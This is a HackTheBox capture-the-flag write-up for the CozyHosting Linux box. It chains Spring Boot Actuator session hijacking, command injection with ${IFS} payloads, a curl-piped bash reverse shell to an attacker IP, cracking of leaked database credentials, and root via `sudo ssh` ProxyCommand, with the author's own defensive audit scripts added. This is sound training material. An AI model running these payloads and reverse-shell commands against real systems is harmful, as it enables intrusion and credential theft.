HTB — CozyHosting
Web · Easy · Linux
Spring Boot Actuator exposes session cookies. Hijacked admin session to exploit command injection in SSH endpoint for reverse shell.
November 26, 2024 · HackTheBox
#Spring Boot #Actuator #Command Injection #RCE
nmap

Full TCP sweep with default scripts and version detection:

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.230
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 11:40 EST
Nmap scan report for 10.10.11.230
Host is up (0.023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_  256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=11/26%OT=22%CT=1%CU=37190%PV=Y%DS=2%DC=T%G=Y%TM=674
OS:5FA24%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A
OS:)SEQ(SP=102%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST11NW7%O2=M53C
OS:ST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1
OS:=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O
OS:=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N
OS:)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF
OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=
OS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   22.31 ms 10.10.14.1
2   22.47 ms 10.10.11.230

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.36 seconds
```
80/tcp open http

Only SSH and HTTP are open. nginx on port 80 redirects to the vhost cozyhosting.htb, so that name needs an /etc/hosts entry pointing at 10.10.11.230 before any of the web enumeration below resolves.

```sh
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
```
```sh
feroxbuster --url http://cozyhosting.htb/
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://cozyhosting.htb/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
404 GET 1l 2w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 97l 196w 4431c http://cozyhosting.htb/login
200 GET 83l 453w 36234c http://cozyhosting.htb/assets/img/values-3.png
200 GET 38l 135w 8621c http://cozyhosting.htb/assets/img/favicon.png
200 GET 29l 174w 14774c http://cozyhosting.htb/assets/img/pricing-ultimate.png
200 GET 34l 172w 14934c http://cozyhosting.htb/assets/img/pricing-starter.png
200 GET 1l 218w 26053c http://cozyhosting.htb/assets/vendor/aos/aos.css
200 GET 1l 625w 55880c http://cozyhosting.htb/assets/vendor/glightbox/js/glightbox.min.js
200 GET 7l 2189w 194901c http://cozyhosting.htb/assets/vendor/bootstrap/css/bootstrap.min.css
200 GET 38l 135w 8621c http://cozyhosting.htb/assets/img/logo.png
200 GET 43l 241w 19406c http://cozyhosting.htb/assets/img/pricing-business.png
200 GET 73l 470w 37464c http://cozyhosting.htb/assets/img/values-1.png
200 GET 29l 131w 11970c http://cozyhosting.htb/assets/img/pricing-free.png
200 GET 14l 1684w 143706c http://cozyhosting.htb/assets/vendor/swiper/swiper-bundle.min.js
204 GET 0l 0w 0c http://cozyhosting.htb/logout
200 GET 7l 1222w 80420c http://cozyhosting.htb/assets/vendor/bootstrap/js/bootstrap.bundle.min.js
200 GET 2018l 10020w 95609c http://cozyhosting.htb/assets/vendor/bootstrap-icons/bootstrap-icons.css
200 GET 295l 641w 6890c http://cozyhosting.htb/assets/js/main.js
200 GET 81l 517w 40968c http://cozyhosting.htb/assets/img/hero-img.png
200 GET 1l 313w 14690c http://cozyhosting.htb/assets/vendor/aos/aos.js
200 GET 79l 519w 40905c http://cozyhosting.htb/assets/img/values-2.png
200 GET 2397l 4846w 42231c http://cozyhosting.htb/assets/css/style.css
200 GET 285l 745w 12706c http://cozyhosting.htb/
500 GET 1l 1w 73c http://cozyhosting.htb/error
401 GET 1l 1w 97c http://cozyhosting.htb/admin
200 GET 285l 745w 12706c http://cozyhosting.htb/index
400 GET 1l 32w 435c http://cozyhosting.htb/[
400 GET 1l 32w 435c http://cozyhosting.htb/plain]
400 GET 1l 32w 435c http://cozyhosting.htb/]
400 GET 1l 32w 435c http://cozyhosting.htb/quote]
400 GET 1l 32w 435c http://cozyhosting.htb/extension]
400 GET 1l 32w 435c http://cozyhosting.htb/[0-9]
[####################] - 2m 30039/30039 0s found:31 errors:0
[####################] - 2m 30000/30000 208/s http://cozyhosting.htb/
```

The hits that matter are /login (200), /admin (401, so there is an authenticated admin area behind the login form), /logout (204) and /error (500). The 400s on paths containing `[` and `]` are wordlist artifacts. The /error response is Spring Boot's default error handler; searching for its text identifies the backend as Spring Boot (Java), which is the cue to switch to the Spring Boot wordlist.

spring boot seclist

SecLists ships a Spring Boot wordlist: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt

```sh
ffuf -w /usr/share/seclists/Discovery/Web-Content/spring-boot.txt:FUZZ -u http://cozyhosting.htb/FUZZ
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://cozyhosting.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/spring-boot.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
actuator [Status: 200, Size: 634, Words: 1, Lines: 1, Duration: 233ms]
actuator/sessions [Status: 200, Size: 48, Words: 1, Lines: 1, Duration: 145ms]
actuator/env/home [Status: 200, Size: 487, Words: 13, Lines: 1, Duration: 299ms]
actuator/env/lang [Status: 200, Size: 487, Words: 13, Lines: 1, Duration: 281ms]
actuator/env/path [Status: 200, Size: 487, Words: 13, Lines: 1, Duration: 257ms]
actuator/env [Status: 200, Size: 4957, Words: 120, Lines: 1, Duration: 294ms]
actuator/health [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 284ms]
actuator/mappings [Status: 200, Size: 9938, Words: 108, Lines: 1, Duration: 268ms]
actuator/beans [Status: 200, Size: 127224, Words: 542, Lines: 1, Duration: 335ms]
:: Progress: [112/112] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
```

Actuator is reachable through nginx without authentication, and the exposed set is far wider than the default (health only): env dumps the application's properties and environment, mappings lists every handler route, beans reveals the application's internal wiring, and sessions lists the live HTTP sessions with their session IDs and the user each one belongs to. That last endpoint is the foothold: take a session ID from /actuator/sessions, open http://cozyhosting.htb/ in Chrome, replace the value of the JSESSIONID cookie (Spring's default session cookie) with it in DevTools under Application > Cookies, and /admin loads as that already-logged-in user. The application.properties recovered later sets a 5-minute session timeout, so a listed session has to be used while its owner is still active.

/admin endpoint
The admin page has a form that takes a host and a username and opens an SSH connection to that host on the server side. The username value reaches a shell unescaped, so a `;` terminates the intended ssh command and whatever follows runs as the application user. The field does not accept whitespace, which is why every space in the injected command is written as `${IFS}`: the server's shell expands the variable back into whitespace and word-splits on it. The trailing `;` in the working payload detaches the injected command from whatever the command template appends after the username.

The first attempt, an ELF reverse shell fetched and piped into bash, did not work: bash interprets a script, not a binary, so the downloaded file is never executed (and the payload also lacks the trailing `;`).

```sh
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.4 LPORT=443 -f elf > rev.elf
```

```sh
host=10.10.14.4&username=test;curl${IFS}http://10.10.14.4/rev.elf${IFS}|bash
```

rev.sh

A plain bash reverse shell served over HTTP from the attacking box and piped into bash works:

```sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.4/443 0>&1
```

```sh
host=10.10.14.4&username=test;curl${IFS}http://10.10.14.4/rev.sh${IFS}|bash;
```

```sh
nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.230] 34426
bash: cannot set terminal process group (1062): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$ whoami
whoami
app
```
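Why the payload is written with `${IFS}` and what the injectable server-side pattern looks like, as an added shell example of my own (not code from the writeup or from the CozyHosting application, whose actual Java handler is not shown here). It builds the exact body posted above from a normal command, then feeds an injected username to a simulated vulnerable handler and to a hardened one. The assumption that the backend concatenated the username into a command string for `sh -c`, the use of `echo` in place of the real ssh call, and the function names are mine.

```sh
#!/bin/sh
# Added example, not from the writeup. It shows (a) why the posted payload
# writes ${IFS} instead of spaces and (b) the server-side pattern that makes
# the username field injectable, next to a hardened version.
# Assumption (mine): the backend built "ssh ... <username>@<host>" as one
# string and ran it through "sh -c". echo stands in for the real ssh call so
# this runs offline; the function names are hypothetical.

# build_payload HOST USER CMD: the form body the writeup posts. Every space in
# CMD becomes the literal text ${IFS}, which passes a "no whitespace" check on
# the field and which the victim's shell expands back into whitespace. The
# trailing ";" detaches the injected command from whatever the server's
# command template appends after the username.
build_payload() {
  nospace=$(printf '%s' "$3" | sed 's/ /${IFS}/g')
  printf 'host=%s&username=%s;%s;' "$1" "$2" "$nospace"
}

# vulnerable_connect HOST USER: input interpolated into a command string that
# a shell parses. ";" ends the ssh command, the attacker's command follows,
# and a trailing "#" comments out the "@host" the template appends.
vulnerable_connect() {
  sh -c "echo ssh -o ConnectTimeout=3 $2@$1"
}

# safe_connect HOST USER: allow-list both fields and pass them as single argv
# elements, so no shell ever parses the user's bytes. Rejects return non-zero.
safe_connect() {
  case $2 in
    ''|*[!a-z0-9_-]*) echo "rejected username: $2" >&2; return 1 ;;
  esac
  case $1 in
    ''|*[!A-Za-z0-9.-]*) echo "rejected host: $1" >&2; return 1 ;;
  esac
  echo ssh -o ConnectTimeout=3 "$2@$1"
}

# Demo: the writeup's payload, then both handlers fed an injected username.
build_payload 10.10.14.4 test 'curl http://10.10.14.4/rev.sh |bash'; echo
vulnerable_connect 10.0.0.1 'test;echo${IFS}INJECTED;#'
safe_connect 10.0.0.1 'test;echo${IFS}INJECTED;#' || true
```

When the body is sent with curl rather than from Burp, pass each field through `--data-urlencode` so `&`, `;` and `|` survive as form data; the `${IFS}` text itself needs no special handling because it is only expanded on the server.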
The running jar sits in /app. Unzipping it exposes the compiled classes and application.properties, which confirms the actuator misconfiguration behind the foothold (the sessions endpoint explicitly enabled and exposed alongside env, beans and mappings), shows the app bound to loopback behind nginx, and hands over the PostgreSQL credentials in plaintext:

```sh
app@cozyhosting:/app$ unzip cloudhosting-0.0.1.jar -d /tmp/app
```

```sh
app@cozyhosting:/tmp/app/BOOT-INF/classes$ cat application.properties
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxRsh
```
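The same misconfiguration from the defender's side, as an added audit script of my own (not from the writeup or the application): it reads a Spring Boot application.properties, flags every exposed actuator endpoint outside a small safe list, the explicitly enabled sessions endpoint and a plaintext datasource password, and then runs against a hardened copy of the file. The property names are the real Spring Boot keys; the safe list, the finding texts, the function names and the hardened values (`management.endpoints.web.exposure.include=health`, `management.endpoint.sessions.enabled=false`, a `${DB_PASSWORD}` placeholder instead of the literal password) are my choices, and the sample file is the one recovered above, embedded here so the script runs offline.

```sh
#!/bin/sh
# Added example, not code from the writeup or the target application: audit a
# Spring Boot application.properties for the settings that made this foothold
# possible. Property names are the real Spring Boot keys; the safe list, the
# finding texts and the function names are mine.

# Actuator endpoints acceptable to expose without authentication.
SAFE_ENDPOINTS='health info'

risk_reason() {
  case $1 in
    sessions) echo 'lists live session IDs (session hijack)' ;;
    env)      echo 'dumps properties and environment (credentials)' ;;
    heapdump) echo 'serves a JVM heap dump (credentials, session data)' ;;
    mappings) echo 'lists every route, including admin handlers' ;;
    beans)    echo 'reveals internal wiring and class names' ;;
    '*')      echo 'wildcard: every endpoint is reachable' ;;
    *)        echo 'not on the safe list' ;;
  esac
}

# prop FILE KEY_REGEX: value of the first matching key, tolerating "key = value".
prop() {
  sed -n "s/^[[:space:]]*$2[[:space:]]*=[[:space:]]*//p" "$1" | head -n 1
}

# audit_props FILE: prints one finding per line; returns 1 if anything was found.
audit_props() {
  found=0
  exposed=$(prop "$1" 'management\.endpoints\.web\.exposure\.include' | tr ',' ' ')
  set -f                       # no globbing: the list may contain "*"
  for ep in $exposed; do
    case " $SAFE_ENDPOINTS " in
      *" $ep "*) ;;
      *) echo "exposed actuator endpoint '$ep': $(risk_reason "$ep")"; found=1 ;;
    esac
  done
  set +f
  [ "$(prop "$1" 'management\.endpoint\.sessions\.enabled')" = true ] &&
    { echo 'sessions endpoint explicitly enabled'; found=1; }
  pw=$(prop "$1" 'spring\.datasource\.password')
  case $pw in
    ''|'${'*) ;;             # empty or a ${PLACEHOLDER} resolved at runtime
    *) echo 'plaintext datasource password in properties'; found=1 ;;
  esac
  [ "$(prop "$1" 'server\.address')" = 127.0.0.1 ] &&
    echo 'note: bound to loopback only; a reverse proxy in front (nginx here) still forwards /actuator'
  return $found
}

# write_sample FILE: constructed sample, the properties recovered from the jar.
write_sample() {
  cat > "$1" <<'EOF'
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxRsh
EOF
}

# write_hardened FILE: the same file with my suggested fixes applied.
write_hardened() {
  cat > "$1" <<'EOF'
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health
management.endpoint.sessions.enabled=false
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=${DB_PASSWORD}
EOF
}

f=$(mktemp)
write_sample "$f";   audit_props "$f" || echo '=> findings in the recovered config'
write_hardened "$f"; audit_props "$f" && echo '=> hardened config is clean'
rm -f "$f"
```

The loopback note is deliberately only a note: `server.address=127.0.0.1` is correct, but it does nothing for /actuator when nginx proxies the whole application, which is exactly the situation on this box. Restricting the exposure list (or moving management endpoints to a separate `management.server.port` that the proxy never forwards) is what actually closes the hole.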
```sh
app@cozyhosting:/tmp/app/BOOT-INF/classes$ netstat -tunlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 127.0.0.1:8080          :::*                    LISTEN      1062/java
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -
```

psql

PostgreSQL listens only on 127.0.0.1:5432 (the Java app is the PID 1062 on 127.0.0.1:8080), so the database is reached from the foothold shell. psql wants a tty, so upgrade the shell first, then connect with the password from application.properties:

```sh
python3 -c 'import pty; pty.spawn("/bin/bash")'
psql -h localhost -U postgres
```

Password: Vg&nvzAQ7XxRsh
```sh
postgres=# \list
                                   List of databases
    Name     |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges
-------------+----------+----------+-------------+-------------+-----------------------
 cozyhosting | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 postgres    | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 |
 template0   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
             |          |          |             |             | postgres=CTc/postgres
 template1   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
             |          |          |             |             | postgres=CTc/postgres
(4 rows)
```
```sh
postgres=# \c cozyhosting
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
You are now connected to database "cozyhosting" as user "postgres".
cozyhosting=# \dt
        List of relations
 Schema | Name  | Type  |  Owner
--------+-------+-------+----------
 public | hosts | table | postgres
 public | users | table | postgres
(2 rows)
```
```sh
cozyhosting=# select * from users;
   name    |                           password                           | role
-----------+--------------------------------------------------------------+-------
 kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
 admin     | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
```

Both hashes are bcrypt (`$2a$`, cost factor 10). The admin one goes to hashcat.
hashcat

Mode 3200 is bcrypt. The admin hash cracks against rockyou:

```sh
hashcat -m 3200 '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6-851-g6716447df) starting
$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm:manchesterunited
```

creds

manchesterunited (cracked from the web admin hash; reused as the local password of josh)

The web admin's password is reused by the local user josh, so `su` from the app shell works without touching SSH:

```sh
app@cozyhosting:/home$ su josh
Password: manchesterunited
josh@cozyhosting:/home$ whoami
josh
```

user.txt

```sh
josh@cozyhosting:~$ cat user.txt
aa8a2946...
```
priv esc

sudo

```sh
josh@cozyhosting:/home$ sudo -l
[sudo] password for josh: manchesterunited
Matching Defaults entries for josh on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty
User josh may run the following commands on localhost:
    (root) /usr/bin/ssh *
```

sudo ssh

The rule allows ssh with any arguments, and ssh's ProxyCommand option is run through `/bin/sh -c` as the user executing ssh, here root. ssh prepends `exec ` to the ProxyCommand string, which is what the leading `;` is for: it turns the prepended `exec` into a no-op and starts `sh` as a second command. The ProxyCommand's stdin and stdout are pipes back to ssh, but its stderr is inherited from the terminal, so `0<&2 1>&2` gives the new shell the terminal on both. The hostname `x` is a placeholder that is never contacted. This is the GTFOBins sudo entry for ssh; the fix is to not grant `ssh *` to a non-root user at all, since any `-o` option is enough.

```sh
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# whoami
root
```

root.txt

```sh
# cat root.txt
bc493293...
```